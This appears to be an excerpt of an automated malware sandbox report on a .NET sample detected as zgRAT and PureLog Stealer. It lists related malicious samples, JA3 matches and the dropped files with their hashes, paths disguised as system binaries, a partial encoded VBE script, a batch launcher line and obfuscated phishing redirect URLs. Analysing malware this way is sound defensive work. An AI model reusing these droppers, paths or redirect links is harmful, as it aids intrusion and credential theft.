	x86-20241130-2047.elf	Get hash	malicious	Mirai	Browse	82.146.62.180
	sora.mips.elf	Get hash	malicious	Mirai	Browse	62.109.30.187
	UNFOT5F1qt.exe	Get hash	malicious	DCRat	Browse	188.120.228.203
	RustChecker.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	188.120.239.221
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==	Get hash	malicious	Unknown	Browse	78.24.219.84
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29t	Get hash	malicious	Unknown	Browse	78.24.219.84
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t	Get hash	malicious	Unknown	Browse	78.24.219.84
FASTLYUS	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	185.199.109.133
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.1.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
MICROSOFT-CORP-MSN-AS-BLOCKUS	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	20.233.83.145
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	20.62.247.7
	rebirth.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	13.95.148.131
	rebirth.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	52.136.145.101
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	22.233.96.48
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	22.33.214.221
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	13.81.52.250
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	13.79.240.226
	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	52.254.132.4
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	51.105.0.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	20.233.83.145 185.199.110.133
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	20.233.83.145 185.199.110.133
	Payment_Advice.vbs	Get hash	malicious	Unknown	Browse	20.233.83.145 185.199.110.133
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	20.233.83.145 185.199.110.133
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.233.83.145 185.199.110.133
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.233.83.145 185.199.110.133
	CLDownloader.exe	Get hash	malicious	XWorm	Browse	20.233.83.145 185.199.110.133
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	20.233.83.145 185.199.110.133
	SigWeb.exe	Get hash	malicious	Unknown	Browse	20.233.83.145 185.199.110.133
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	20.233.83.145 185.199.110.133

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with very long lines (619), with no line terminators
Category:	dropped
Size (bytes):	619
Entropy (8bit):	5.859601557245224
Encrypted:	false
SSDEEP:	12:eOj6RnK8dQuLhb0BE8nLOfkMxMXhaJLNvXVSM45cPzVR:9j6JQg8ng5KqLNvFS0v
MD5:	3FFF3C77BB60D7CAEFCC0CA44E193495
SHA1:	FF09FCD1D0F048089B372D3DC6BFF3E6568E047B
SHA-256:	2D0C8859B34DA1E20D223F3D3D2F6DA579920DFF6194644A0F6C3BEBE573AC44
SHA-512:	0604A0560BC94F769B9E9D10D16673C345C883FCFDE0B10DC17FB2952EC8B0AC8976206BF090B58E000A59B70AD8A56608A2FC7AA1D581C3A9203B991707717E
Malicious:	false
Preview:	gU7HygHfy05nXIVCAiiBiN7diQPLZWbG7cZe0Gm3chs6Sh7Q0chnkLDTWdihQ6FcYzp4t0L46piBfALBS9U7yyfwYGIWiEnfbPic2ChAQnr5nCxVSgPRmInjT3gmszV1CCjPcsJPcUrLHjIVSwECzV3Tl8J8g4RbSz3kdi3kX9zRbcctuKT5uTBqIPnejKthCQ3Rqi2u3do0gm2JfZOVkVq8yMcN4YBMPRPLjKDMSjCRoKKgXe8J5X6qj4cdFozecckOXqjVVCDBTYUoC5zaa1Q2UilpsjGnuiyLj5Jq5ny3U5XLjyaJzZEkLs3yF4nv6ZQvkIEGwIfxDXhZKaF3I6yVdOA0CUlBAC74pmlatUWq4QhyLenpytm9l5RWINEchdxAZntizoJyjHbNqLpiq6MQa7StVPSgQ4JadhYhuF0JkxadeEp6igwlRgjcUANkWnip8AtIwIxlGDqmhzPQjV7uHhJ776Nu1Px6PufdUhKasLfO074fv6AApxha1wK04Dt0PtWwUv6CLhB6C4HABr94OwRbNEliWTfpbp8GlIL9A8zIwkY6oKyNDyldc4jPJXp1CWeX6AZ3g94Q7Jpmpo3LeSlnDfoqi50nT7GaGAA

C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\c5b4cb5e9653cc

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with very long lines (345), with no line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.8420518315867405
Encrypted:	false
SSDEEP:	6:jXh7Du7WBde8GGKHJiJSaW8cNi6X407sRXc7Fc4A0UD:jx7DuXicaWzdX4+BBa
MD5:	F40B8400303F5D3822266FB7D5BD48C3
SHA1:	E8D56C6DF87C6209B245954E833632AFC4DCE4A6
SHA-256:	1A5411D25C228335F135BAACF7C79D02B740C8DB448241516DA6999E559C5CD6
SHA-512:	A5C6CC67E9D8A3986D15CCC84ED0237366DA75390A054F08E7A2FABA5D8D70122BCBFC609A644E22F0AB48E87BDEA67042725DABCAD918C7976F146219A755E6
Malicious:	false
Preview:	G1w2ojdQ7lIKVPvR9wlXDD3trVbe8zRZs4e04FJre7YGeyxQeU8JqPRC7DLSI9RHTsbau4X4n42GpxO2iL9o1Hsdnc3030ifqRwvXWfk6EfwWKXKySu79mPL98xSBhAxVXaXAcfLpZsxm6GcEsBkFlgDBlwYjNiZDsb9u9KWxjRj4cjD1VNSfZrt1WWZqGlb0St3fHrFipxgT6JiBthNAQ3nBrIYmvqr7ztlsphtnHt0mLZ4NxX6iYbkYF2x8Tcx8FieNhzVLxj2gDBzRNKzXtIjXIMnxtuUp51gm5rp7CuuyjDVECgvInaP69GEVMibCPMkLeNWff1V8XvyF0iuN9LBf

C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\ServerfontSessiondhcpcommon\0d889c0c136da2

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.792518928201071
Encrypted:	false
SSDEEP:	6:U0MMSdqFcE/V/VNurpOk2yEQxpe/gtg7P0Qpef8KOdTmdKoIVRzQ9B+:U0MMSUFceTmODDQv8gtMP0QejyTm5yRv
MD5:	F3E72A34BDAF481A9194F2A2AC2CD135
SHA1:	DD50BBBDF46BD0AFC4BB8CD92F914E4F3FD262EC
SHA-256:	66AFD21D6AC1AD19FE7A58F83C554906DB521E4E78B1AFA026B3CD5E759BAFC1
SHA-512:	C49C2BD0AB785F534E409678382BF266968AA68512FB03BDE8390D9D011603A5B2B8CFB669009B6419CC0B68AB7C67BEAA08369BCFC9B41CFABE6395AD4DF4BC
Malicious:	false
Preview:	nwFQiOR9enxODDLFj4kg2KG1ppLbmq95DuiPZVBYhozHqEpfLWkpOnXcqNk3C0Wxo2KTf5pO3L9OU8LkAqPPGUqaWFjMuHWqRCdx4WAQrWvDoIHrCA2VkHqULu6ZWddvyS7SfXqoq9iuimwO71JuPAGJVJlKZk3N2AOVLzLoTOplj5vj7rbeUsgxMx6WvfOFFU1iXaCIpeaAVekZXCMsIZ3KdbJY2z2yAkfODMLhpTyzRfcrMg8tTg6qbrE6QoP0l

C:\ServerfontSessiondhcpcommon\27d1bcfc3c54e0

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with very long lines (420), with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	5.84879648509994
Encrypted:	false
SSDEEP:	12:5H/Bid2amOGAM/nPhamLrgzdHTJQ33NowTXSH9PJyn:Z5m1RM3Q9dH6399TXAM
MD5:	2A88DCEC8EDA766FB7F7707F0B886388
SHA1:	601650C88F68A28A90A6FF0E277ACD4146EC7A97
SHA-256:	21021C582433A28281A6C5CA16B99958844753530676B56DC3385064FC21C618
SHA-512:	333DA6824F1ED0EF22781AD69DFE11E1BBE3D17BFCC7AC32280A8CB5706839E8D448815B7856E600D3896C9761C0A02E0D131A833B3854ABA0FDEDF79BB62B72
Malicious:	false
Preview:	RGwvfhRQIQSvlu292XRQKTV76IEmEebqCjUCDkiox4pMIE6boMFPWxP7uyzWcoMozmsBaz6RymcPnJz1Lm81YLTPTXROvMLJsBWfV4ByQyauU9Tk87K0qUPnSdsDhrgmaThmxTfRlKlkvj5TDqPxBVdXvtN2M8QiRxTAcrxpc3Pfsp2tiY91btlE0K0DGnEm4DS7P41W3kVIG7pG1dTy8ZGiMOJR0uiyymlpW4dngn70Xc83euMmTPnf6uvBvjfJCgTeWAt6ApSVbPKtQQxFh5ej9GsmJc26Iyy1JdheBPmo7SDrkBufwZlGCufPRHxhxVNmbTkwsSERT0lqCABIrXJsNrzY8RN4cE0mFbQRa8weVTxLIyNQFp0ZLeYtdLxbFJzO99lluustlpW34nPKE6yxNbakChxOKUZL

C:\ServerfontSessiondhcpcommon\6dd19aba3e2428

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	ASCII text, with very long lines (588), with no line terminators
Category:	dropped
Size (bytes):	588
Entropy (8bit):	5.858010730564589
Encrypted:	false
SSDEEP:	12:ffBHTU0dVcpHPdYPkRkTO+tO+MnGGbrAPTUKti3gZno5Z7ze6SR3YGuf:ffBHXM+sRk7tOrwbxiQZor7CRA
MD5:	13559ECA2A0530E83886E5BC2166B634
SHA1:	9BB5F0859105C8BC2BDA6049FDD255073A080497
SHA-256:	B4CB3EBC84DCBF72F7C8BDCA8D2A98CA6F4856235D8A9D54162D40F1A0DDEDFA
SHA-512:	454D611AD090A1063FC131C9CC03525004772B19A7ED3F063C7F0935D36689B8401ED9FFECC45D58895EC4D3D68350F53C9A55BAFAE549E878B57EF341E61E8E
Malicious:	false
Preview:	D278cLW0JednyxWHOQBD8Npfss0Ky1odGGXzH8yc3AcHgGKi9CnXBwmzNcQuVLCR0AgsZgAPciJ8vh8lhRKvOQbUehmpsEGr7KRgkcJdCX5dmnDpdoMDARDkjMN13VhYcbAlQcBFIrs1U8r0e6LD1CrqHq7XORjq0hBKnbZBnG5TiLPkeXX6KdgZuTejen10HBAx7hMChJZuHXI5bW204ngWAmZU70gAPEMgKbn7KUZADvRXLjHIvA6efnwVH2ErnZfCLluAs4qjNgTPUCIYsYOPIrBgoS0RQsWnQPLkyHZ0UWQ8UhAEuq8PKQ3djNVaEYTfJp8F0ijl8Y4wbCMGRwhjuHcAVsAkv9w5Duzoj5NMHWQwVHCgBOIR0uvCM8tIh8z9l8sqNhhWiVbX0qoOqdjh0eFT9wbkLFoIgRKWYVSdqwtfSXLgTfcDYSJH3ZrbF7KdqT0jfSzULF0EvjAll5QqmltOIDc8n1YtlPz9hlABpH2TbFWUYFzKqe0Ejlbcz1rTrHcftBE94PAftaxDqIjhCODHZuZ5KhMyailUm1kWBzPadVVIyYwqRJRdDUF9mJzWDMELycaz

C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\ServerfontSessiondhcpcommon\System.exe

Download File

Process:	C:\ServerfontSessiondhcpcommon\comReviewsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerfontSessiondhcpcommon\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerfontSessiondhcpcommon\System.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\ServerfontSessiondhcpcommon\comReviewsvc.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2030080
Entropy (8bit):	7.572409554640235
Encrypted:	false
SSDEEP:	24576:a80BXGwUcxqpsuNPJMYBhb0FmCVd3hAnp504X5zxzFBsLuQ/PRz40rno:abGwUj6YB+lJApdxRHk7
MD5:	53D61BC60C85CB1647B5556C4225FB86
SHA1:	ED89637915CAB70A4C2E5D90ECD5F8F5A4C5D950
SHA-256:	ADE637C5BF346E5D7F540AF134C7D7850A8E4DE3FFC7314BE025049EA76C26C9
SHA-512:	29FEF07E43C20D63725A8A19453833DC2ED8CFE6B876903F98EC78AA2FB76B00D8ACB32DFE6CFA2CFAC661B4BED8FF87A8A3178C8B92CFC216BEC39C110D64DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.................................p...K.... ..p....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H..................k.......10...........................................0..........(.... ........8........E...........N...)...8....(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E....P.......................8K...~....(F... .... .... ....s....~....(J....... ....~....{r...9....& ....8........~....(N...~....(R... ....?b... ....~....{....:]...& ....8R...8>... ....~....{s...99...& ....8

C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DC.exe
File Type:	data
Category:	dropped
Size (bytes):	246
Entropy (8bit):	6.000983858285551
Encrypted:	false
SSDEEP:	6:GowqK+NkLzWbHnrFnBaORbM5nCSkmgtp85FM:GpMCzWLnhBaORbQCS2ty5FM
MD5:	DAD7962EA7E649F3686977BA4A094CD1
SHA1:	4F9EDDED3610CAA6E7AEAE4C320EC9364AD3DAE9
SHA-256:	3EA5EF288DB40A5367E1DA7F7E3DCBAB4EB00B28AEBB6062D5DD438BD142A187
SHA-512:	9C94CE5A37C0AA1162AE22813A52C7FC26602EAA168DE89E473FC51A84DF36924225E2F9CC993F6B2722D114758EB001021030216E96098B6BCA18694450128E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^3QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v f!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zj.D7+D6W.O?./dkKx[41wmKh:KxzJ.]/g W\|L\o0D09Z\PC(m0em5n.3S9\W}-T4P9I`sR(lDE~,!SP6lsd.5EcAAA==^#~@.

C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\DC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.952855751945731
Encrypted:	false
SSDEEP:	3:5HXusmAwuRAIdX3LLCVTkrPkAqvrq:t+slAIR/nkAqG
MD5:	17BA03D0114961884EC77DDB3C2DFC68
SHA1:	A6C819FA6F591756A10A34BFCA86D5398E394448
SHA-256:	7DD517CC729D3C0714B6AA0E30260B2DBE8A1CC2DC5DD3D3E4910724E8744326
SHA-512:	AF17E1DE79ED60E34E4AD98281F44DC9321CDF671BE05BD0D8A765460B274871FE5F88C59B45F4153286D1D8A0BC9F04E9BFA326A47230C0D17FBEB149F71390
Malicious:	false
Preview:	%ysBv%%HOKIawG%..%PKKt%"C:\ServerfontSessiondhcpcommon/comReviewsvc.exe"%JJNGEl%

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Dfim58cp4J.exe.log

Download File

Process:	C:\Users\user\Desktop\Dfim58cp4J.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	true
